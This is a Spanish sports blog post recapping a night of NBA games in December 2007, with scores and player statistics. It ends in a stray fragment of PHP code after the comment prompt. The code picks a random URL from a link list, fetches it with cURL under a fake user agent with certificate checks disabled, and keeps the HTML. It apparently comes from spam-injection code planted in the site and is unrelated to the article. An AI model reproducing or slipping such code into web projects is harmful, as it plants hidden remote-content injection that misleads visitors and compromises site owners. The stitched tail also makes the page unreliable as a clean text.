La crónica (14/12/07)

15 de December de 2007 por Jabho

Por Xapa y Jabho

Victoria de los inesperados Kings, Calde sigue a gran nivel con los Raptors, a los C´s no hay quien les tosa en casa, Howard y el artículo 34, Pau lesionado, los Bulls lamen sus heridas contra los Knicks, Porland sorprende y el showtime de los creyentes…

Kings 109 – 99 76ers

Partido dominado cláramente por los interiores de Sacramento, Miller y Moore, que con la ayuda de Salmons, natural de Philadelphia, y el renacido Udrih fue suficiente para ganar a los Sixers. El partido fue igualado hasta el tercer cuarto en el que Sacramento consiguió la ventaja de 9 puntos que a la postre fue definitiva. El dominio en el rebote de Sacramento y los altos porcentajes de tiro, esperables si la dominas la zona, claves para la victoria.

Moore marcó su máxima anotación en su carrera con 24 puntos. Brad Miller con 25 puntos, 10 rebotes y 6 asistencias fue el jugador más destacado. Por los Sixers, el cumplidor Andre Miller con 24 puntos y 8 asistencias fue el mejor anoche.

Raptors 104 – 93 Pacers

Victoria muy importante de los Raptors en el Conseco ante un rival que ahora mismo es equipo de PlayOffs. Y no empezaron bien los de Toronto ya que en la primera parte Tinsley se impuso a Calderon, que jugaba con molestias en un dedo, tanto en ataque como en defensa. Y al ritmo de Tinsley, con buenas aportaciones de O´neal, Dunleavy o Granger, Indiana acabó la primera parte con 11 puntos de ventaja sobre Toronto. Por los Raptors Bosh y Humphries sostenían al equipo.

Pero en la segunda parte volvió el gran Calderón, Kapono cogió su fusil y el duo Humphreis-Bosh siguió con su buen trabajo en la zona para que Toronto le diera la vuelta al partido y se llevara el gato al agua. Kapono con 29 puntos y 6/7 en triples, Bosh 22 putnos y 16 rebotes y Calderon 18 puntos y 16 asistencias (tope por ahora en su carrera) los mas destacados en Toronto. Tinsley, 19 puntos y 10 asistencias, y Dunleavy 23 puntos, 6 rebotes y 5 asistencias fueron los más destacados por Indiana. Jermaine empezó muy bien pero se diluyó conforme avanzaba el partido.

Bucks 82 – 104 Celtics

No parecían los irregulares Bucks el equipo mas apropiado para romper la imbatibilidad de Boston en su casa. Y eso que los Celtics se presentaban con la baja de uno de los vertices del triángulo, Ray Allen.
Hasta el descanso Milwakee estuvo en el partido, pero un gran tercer cuarto de los Celtics sentenció el encuentro. Pierce fue el mejor para Boston, lo lleva siendo los últimos partidos, con su máxima anotación este año: 32 puntos. Garnett se quedó en 15 puntos y 7 rebotes. Clave fue el sustituto de Ray Allen, Toni Allen, que anotó 11 puntos pero que dejó a Redd, máximo anotador de los Bucks con más de 23 puntos por partido, en sólo 7 puntos con malos porcentajes. Rajon Rondo sigue consolidándose y aportó 17 puntos y 8 asistencias.

En Boston no se conocia un inicio de campaña con 12 victorias en casa desde el año 85. Aquel año Bird, Mchale y Parish llevaron a Boston a jugar las finales.

Magic 103 – 87 Bobcats

Otro partido esta noche que se decide en el tercer cuarto, ya que hasta el descanso la ventaja era de los Bobcats. Pero un parcial de 30-13 en ese tercer cuarto dejó el partido encarrilado para los Magic.
La noche comenzó con el anunció de que los Bobcats adquirian a Nazr Mohamed a cambio de Brezec y Herrmann. De Nazr esperan fuerza en el juego interior para que no les pase como anoche, donde Howard se hizo el dueño de la zona y del partido. Espectacular la temporada de Dwight que lleva una media de 23 puntos y 15 rebotes. Anoche 33 puntos, 18 rebotes y 4 tapones para demostrar que es uno de los interiores mas dominantes de la liga. A su lado Turkoglu con 22 puntos y un buen partido de Nelson fueron suficientes para vencer a los de Charlotte. Por los Bobctas estuvieron correctos sin mas sus jugadores principales, Felton-Richardson-Wallace-Okafor, pero no encontraron la aportación de ningún jugador del banco.

Cavaliers 97 – 105 Nets

Si Carter y Jefferson están acertados, Kidd cumple como siempre y encuentran la aportación de algún jugador interior, los Nets pueden ganarle a cualquiera. Anoche vencieron a los Cavs que a pesar de la derrota, y con las incorporaciones de Hughes y Verajao a la rotación, son equipo a tener muy en cuenta.
En el cuarto periodo y con el partido igualado, los Cavs emularon la táctica de la Hack-a-Shaq sobre Boone que llevaba un 20% desde la linea en lo que va de temporada. No les salió bien ya que en los tiros libres decisivos hizo 2 de 4, suficiente para que los Nets se llevaran el partido con una buena actuación por su parte. Carter con su máxima anotación de la temporada, 32 puntos, fue el mejor de los de New Jersey. Lebron e Ilgauskas fueron los mejores por parte de los Cavs.

Hawks 81 – 91 Pistons

En ningún momento dió la sensación de que Atlanta pudiera ganar a los Pistons, equipo con el que ha perdido los 3 partidos que ha disputado este año. El 47-33 a favor de los de Detroit al descanso da muestras de ello.
Los Hawks sólo contaron con 11 jugadores por la ausencia de Childress y la sanción de Horford, y de estos 11 sólo 3 tuvieron una ctuación correcta: Joe Johnson, Marvin Williams y Josh Smith. En general el equipo estuvo muy desacertado en el tiro con un 35%. Por los Pistons el mejor fue Billups ayudado por Hamilton, Prince y con la buena aportación desde el banco de Maxiel, 10 puntos y 8 rebotes.

Clippers 98 -91 Grizzlies

Con la enfermería al completo, esta vez se sumó en el primer cuarto Tim Thomas a los habituales los Clippers, se tuvieron que remitir a Maggette y a Kaman para lograr una laboriosa victoria, ambos lograron 23 puntos y el último además aporto 16 rebotes. Con un 10-2 al inicio del 4º periodo los Clippers tomaron suficiente ventaja para ganar. Cuttino Mobley puntuó 17 junto a 6 asistencias. Los Clippers tuvieron transacciones esta semana, primero cortaron al veterano Ruben Patterson y el viernes ficharon a Richie Frahm, que ya debuto en este partido. Frahm jugó en Rockets, Twolves, Portland y Sonics además hizo esta pretemporada con Suns aunque fué cortado. Por parte local Miller lideró con 23 puntos mientras Warrick añadió 20 y Gay 12. JC Navarro tuvo una actuación discreta siendo titular con 8 puntos y rebotes.

 

Los Memphis en este partido dejaron un record negativo para la franquicia 25 perdidas de balón, Miller se llevó la palma con 6. Además los Grizzlies contaron con la baja del catalán Pau Gasol, que según su web dice que se perderá los próximos 5 partidos por una herida en el dedo del pie. Veremos cuantos partidos ganan sin él.

Supersonics 99 – 88 Timberwolves

En un partido con los dos conjuntos de la “nortwest” en horas bajas y peor clasificados, se lo llevaron los visitantes con un gran Chris Wilcox que se erigió el mejor con 19 puntos y 11 rebotes. Kurt Thomas añadió 18 puntos y 8 rebotes y otros 2 titulares también consiguieron llegar a 10 o más puntos, Wilkins y Durant. Desde el banco Luke Ridnour va incrementando sus minutos después de su lesión haciendo 13 puntos y 7 asistencias y, lo mejor, jugando bien.
Por los jóvenes lobos, que han perdido 8 de los últimos 9 partidos y empatan como el peor inicio de la franquicia desde 1991, el mejor volvió a ser Al Jefferson con 22 puntos y 16 rebotes. McCants desde el banco añadió 17. Sólo pusieron a los Sonics en un momento critico cuando iban 77 a 72.

Knicks 96 – 101 Bulls

Los Bulls parece que van encontrando la senda victoriosa gracias en parte a la salud de Luol Deng, con unos grandes numeros 19 puntazos y 10 rebotes, que se sobrepusieron a los maltrechos Knicks que acumulan 5 partidos perdidos. Además Kirk Hinrick logró su segundo triple doble de su carrera con 15 puntos 14 asistencias y 12 rebotes. Pero la victoria no fue facil ya que cuando quedaban 25 segundos solo ganaban de 3 puntos y gracias a 4 tiros libres de Hinrick y 2 de Gordon se pudo quedar la victoria en la plaza. El argentino Nocioni logró 17 puntos y 5 tapones desde el banco.

 

Zach Randolph con 27 puntos y 15 rebotes salvó del ridículo a los Knicks, además fue el quien logró el triple que acercó a su equipo a 3 puntos a falta de 25 segundos. Fred Jones cuajó buen partido con 22 puntos. Horrible estuvo Eddy Curry que no metió ninguno de los 5 lanzamientos que intento.

Hornets 80 – 89 Mavericks

Los Mavs se presentaron al partido con la mejora en defensa impuesta por Avery Jonson ya que recibieron muchos puntos la semana pasada frente a SA, Denver y Utah. Sus jugadores los captaron y pudieron doblegar a los de New Orleáns dejando a estos en 36% de tiros. Esta vez el que estuvo fino fue Jason Terry con 25 puntos. Stackhouse de reserva consiguió 16 puntos, Josh Howard, después de una herida en el ojo, añadió 15, 10 rebotes y 5 asistencias pero el MVP continua jugando mal y solo anotó 7 puntos pero añadió 9 rebotes y 6 asistencias con un 8 de 23 en tiros en los 2 últimos partidos.
Cris Paul fue nuevamente el mejor con 22 puntos, Chandler consiguió 15 puntos y 11 rebotes, aunque la faceta reboteadora del partido se llevo David West 13 pero no estuvo tan fino tirando ya que se marcó un 2/10. Stojakovic con dolores en la ingle se quedo en 10 puntos en 22 minutos de juego. Mo Pet, que venia con problemas de espalda, se marcó un escandaloso 1/6 en tiros.

Jazz 91 – 99 Trail Blazers

La campanada de la jornada la dieron los Blazers al imponerse en casa a los Jazz, y con esta ya van 6 victorias consecutivas, y esto no pasaba desde el 2002. Lo contrario le pasa a Jazz que se sitúan con 6 derrotas consecutivas. Cuando Roy esta enchufado el equipo lo nota. Esta vez se quedó en 29 puntos junto con Outlaw 21 y 6 rebotes y James Jones con 14 puntos, estos dos últimos saliendo desde el banco. LaMarcus Aldridge continua sin jugar gracias a la fascitis plantar.
Por los músicos Boozer volvió a ser el director de orquesta con 22 puntos 12 rebotes y 6 asistencias, aunque tuvo que abandonar el partido por sumar 6 faltas. El ruso Kirilenko se quedó en 16 y 8. Deron Williams que pasa por un bache en su juego terminó con 11 puntos 10 asistenicas. Brewer añadio 13 para su equipo. Jarron Collins tuvo que actuar de titular ya que Memo Okur no disputó ni un solo minuto de juego con problemas en su trapecio. El ucraniano Fesenko jugo para Utah 4 minutos ya que fue repescado de la Liga de Desarrollo.

Lakers 106 – 108 Warriors

Aunque Bryant pueda ser el mejor de la liga, nadie hace tan bien el showtime como Baron Davis. Bryant tuvo un sitio privilegiado para ver como Davis se llevaba la victoria para sus Warriors. Davis anotó el decisivo triple con 16 segundos para terminar el partido e hizo volar besos a la muchedumbre enloquecida. Davis motivado por enfrentarse contra el equipo de su ciudad natal concluyó con 22 puntos, 8 de ellos en los ultimos 3 minutos y 6 asistencias. Stephen Jackson, que ha dado un aire nuevo a los GSW, concluyó con 20 puntos y 8 rebotes. También aportaron mucho al juego Ellis con 19, 7 y 6, y Al Harrington el mejor del banco con 22 puntos.
Los angelinos, que perdieron una renta de 8 puntos en los últimos 3 minutos, sucumbieron ante los mas de 20 mil espectadores que estaban en el Oracle Arena. La estrella Bryant hizo demasiado con 21 puntos, aunque con mal acierto de triple 0/6, ya que se lesionó en el cuadriceps, según él, o la ingle, según el club, a falta de 2 minutos. El joven pívot Bynum hizo un buen trabajo con sus 17 puntos y 16 rebotes, solo fallando 2 tiros de campo. Odom también colaboró con 18 y 15 pero no fue suficiente.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>